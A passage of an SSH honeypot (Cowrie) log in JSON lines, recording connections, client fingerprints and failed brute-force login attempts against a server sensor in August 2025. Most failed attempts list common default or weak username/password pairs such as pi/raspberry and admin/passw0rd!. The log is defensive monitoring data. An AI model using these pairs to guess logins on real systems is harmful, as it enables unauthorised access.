a-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T03:31:24.114291Z","src_ip":"212.227.125.160","session":"5954760a8614"}
{"eventid":"cowrie.login.failed","username":"app","password":"123123","message":"login attempt [app/123123] failed","sensor":"my-vps","timestamp":"2025-08-31T03:31:24.922446Z","src_ip":"212.227.125.160","session":"16b3fdf5338d"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:31:26.175355Z","src_ip":"212.227.125.160","session":"16b3fdf5338d"}
{"eventid":"cowrie.login.failed","username":"guest","password":"P@ssw0rd123","message":"login attempt [guest/P@ssw0rd123] failed","sensor":"my-vps","timestamp":"2025-08-31T03:31:26.660177Z","src_ip":"212.227.125.160","session":"5954760a8614"}
{"eventid":"cowrie.session.closed","duration":"4.6","message":"Connection lost after 4.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:31:28.210401Z","src_ip":"212.227.125.160","session":"5954760a8614"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60750,"dst_ip":"1.2.3.4","dst_port":22,"session":"7ed4f9da8028","protocol":"ssh","message":"New connection: 212.227.235.229:60750 (1.2.3.4:22) [session: 7ed4f9da8028]","sensor":"my-vps","timestamp":"2025-08-31T03:31:34.779502Z"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"21.4","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 21.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:31:40.914906Z","src_ip":"212.227.235.229","session":"24b5445c7000"}
{"eventid":"cowrie.session.closed","duration":"109.6","message":"Connection lost after 109.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:31:40.960312Z","src_ip":"212.227.235.229","session":"24b5445c7000"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":56074,"dst_ip":"1.2.3.4","dst_port":22,"session":"e346441f5e75","protocol":"ssh","message":"New connection: 41.226.27.251:56074 (1.2.3.4:22) [session: e346441f5e75]","sensor":"my-vps","timestamp":"2025-08-31T03:31:41.932474Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:31:41.933539Z","src_ip":"41.226.27.251","session":"e346441f5e75"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:31:41.977118Z","src_ip":"41.226.27.251","session":"e346441f5e75"}
{"eventid":"cowrie.login.failed","username":"test2","password":"test2","message":"login attempt [test2/test2] failed","sensor":"my-vps","timestamp":"2025-08-31T03:31:42.107658Z","src_ip":"41.226.27.251","session":"e346441f5e75"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:31:43.410183Z","src_ip":"41.226.27.251","session":"e346441f5e75"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:31:50.953068Z","src_ip":"212.227.235.229","session":"7ed4f9da8028"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:31:50.954225Z","src_ip":"212.227.235.229","session":"7ed4f9da8028"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47206,"dst_ip":"1.2.3.4","dst_port":22,"session":"f19c15dd2f73","protocol":"ssh","message":"New connection: 212.227.235.229:47206 (1.2.3.4:22) [session: f19c15dd2f73]","sensor":"my-vps","timestamp":"2025-08-31T03:32:01.288633Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:32:02.152009Z","src_ip":"212.227.235.229","session":"f19c15dd2f73"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T03:32:02.152839Z","src_ip":"212.227.235.229","session":"f19c15dd2f73"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":57492,"dst_ip":"1.2.3.4","dst_port":22,"session":"fe12f8f44f22","protocol":"ssh","message":"New connection: 41.226.27.251:57492 (1.2.3.4:22) [session: fe12f8f44f22]","sensor":"my-vps","timestamp":"2025-08-31T03:32:02.494571Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:32:02.495262Z","src_ip":"41.226.27.251","session":"fe12f8f44f22"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:32:02.539534Z","src_ip":"41.226.27.251","session":"fe12f8f44f22"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"oracle123","message":"login attempt [oracle/oracle123] failed","sensor":"my-vps","timestamp":"2025-08-31T03:32:02.670561Z","src_ip":"41.226.27.251","session":"fe12f8f44f22"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:32:03.987900Z","src_ip":"41.226.27.251","session":"fe12f8f44f22"}
{"eventid":"cowrie.login.failed","username":"oscar","password":"oscar","message":"login attempt [oscar/oscar] failed","sensor":"my-vps","timestamp":"2025-08-31T03:32:06.045513Z","src_ip":"212.227.125.160","session":"7e80cd19b9f1"}
{"eventid":"cowrie.login.failed","username":"guest","password":"letmein","message":"login attempt [guest/letmein] failed","sensor":"my-vps","timestamp":"2025-08-31T03:32:08.193141Z","src_ip":"212.227.235.229","session":"f19c15dd2f73"}
{"eventid":"cowrie.session.closed","duration":"8.6","message":"Connection lost after 8.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:32:09.891500Z","src_ip":"212.227.235.229","session":"f19c15dd2f73"}
{"eventid":"cowrie.session.closed","duration":"93.5","message":"Connection lost after 93.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:32:18.859857Z","src_ip":"212.227.125.160","session":"7e80cd19b9f1"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":52300,"dst_ip":"1.2.3.4","dst_port":22,"session":"5d88de1d6671","protocol":"ssh","message":"New connection: 41.226.27.251:52300 (1.2.3.4:22) [session: 5d88de1d6671]","sensor":"my-vps","timestamp":"2025-08-31T03:32:22.601047Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:32:22.732683Z","src_ip":"41.226.27.251","session":"5d88de1d6671"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:32:22.733489Z","src_ip":"41.226.27.251","session":"5d88de1d6671"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37442,"dst_ip":"1.2.3.4","dst_port":22,"session":"cbf2e633d312","protocol":"ssh","message":"New connection: 212.227.125.160:37442 (1.2.3.4:22) [session: cbf2e633d312]","sensor":"my-vps","timestamp":"2025-08-31T03:32:22.853942Z"}
{"eventid":"cowrie.login.failed","username":"guest","password":"123456","message":"login attempt [guest/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T03:32:22.914735Z","src_ip":"41.226.27.251","session":"5d88de1d6671"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:32:23.359443Z","src_ip":"212.227.125.160","session":"cbf2e633d312"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T03:32:23.360126Z","src_ip":"212.227.125.160","session":"cbf2e633d312"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:32:24.143538Z","src_ip":"41.226.27.251","session":"5d88de1d6671"}
{"eventid":"cowrie.login.failed","username":"guest","password":"letmein","message":"login attempt [guest/letmein] failed","sensor":"my-vps","timestamp":"2025-08-31T03:32:25.771946Z","src_ip":"212.227.125.160","session":"cbf2e633d312"}
{"eventid":"cowrie.session.closed","duration":"4.6","message":"Connection lost after 4.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:32:27.416852Z","src_ip":"212.227.125.160","session":"cbf2e633d312"}
{"eventid":"cowrie.login.failed","username":"oscar","password":"oscar","message":"login attempt [oscar/oscar] failed","sensor":"my-vps","timestamp":"2025-08-31T03:32:39.540736Z","src_ip":"212.227.235.229","session":"7ed4f9da8028"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55248,"dst_ip":"1.2.3.4","dst_port":22,"session":"47961f646b0b","protocol":"ssh","message":"New connection: 212.227.125.160:55248 (1.2.3.4:22) [session: 47961f646b0b]","sensor":"my-vps","timestamp":"2025-08-31T03:32:39.948264Z"}
{"eventid":"cowrie.session.connect","src_ip":"34.14.223.46","src_port":60724,"dst_ip":"1.2.3.4","dst_port":22,"session":"9a73d649c127","protocol":"ssh","message":"New connection: 34.14.223.46:60724 (1.2.3.4:22) [session: 9a73d649c127]","sensor":"my-vps","timestamp":"2025-08-31T03:32:42.259332Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:32:42.522590Z","src_ip":"34.14.223.46","session":"9a73d649c127"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":60232,"dst_ip":"1.2.3.4","dst_port":22,"session":"95197ab2496e","protocol":"ssh","message":"New connection: 41.226.27.251:60232 (1.2.3.4:22) [session: 95197ab2496e]","sensor":"my-vps","timestamp":"2025-08-31T03:32:43.122613Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:32:43.123429Z","src_ip":"41.226.27.251","session":"95197ab2496e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:32:43.167068Z","src_ip":"41.226.27.251","session":"95197ab2496e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:32:43.263932Z","src_ip":"34.14.223.46","session":"9a73d649c127"}
{"eventid":"cowrie.login.failed","username":"wang","password":"wang","message":"login attempt [wang/wang] failed","sensor":"my-vps","timestamp":"2025-08-31T03:32:43.300758Z","src_ip":"41.226.27.251","session":"95197ab2496e"}
{"eventid":"cowrie.login.failed","username":"pi","password":"raspberry","message":"login attempt [pi/raspberry] failed","sensor":"my-vps","timestamp":"2025-08-31T03:32:44.276531Z","src_ip":"34.14.223.46","session":"9a73d649c127"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:32:44.579450Z","src_ip":"41.226.27.251","session":"95197ab2496e"}
{"eventid":"cowrie.session.closed","duration":"4.0","message":"Connection lost after 4.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:32:46.283776Z","src_ip":"34.14.223.46","session":"9a73d649c127"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38052,"dst_ip":"1.2.3.4","dst_port":22,"session":"79282e07e3f3","protocol":"ssh","message":"New connection: 212.227.125.160:38052 (1.2.3.4:22) [session: 79282e07e3f3]","sensor":"my-vps","timestamp":"2025-08-31T03:32:47.771968Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:32:47.772995Z","src_ip":"212.227.125.160","session":"79282e07e3f3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T03:32:48.016012Z","src_ip":"212.227.125.160","session":"79282e07e3f3"}
{"eventid":"cowrie.login.failed","username":"admin","password":"passw0rd!","message":"login attempt [admin/passw0rd!] failed","sensor":"my-vps","timestamp":"2025-08-31T03:32:49.203912Z","src_ip":"212.227.125.160","session":"79282e07e3f3"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:32:50.448113Z","src_ip":"212.227.125.160","session":"79282e07e3f3"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:32:52.522262Z","src_ip":"212.227.125.160","session":"47961f646b0b"}
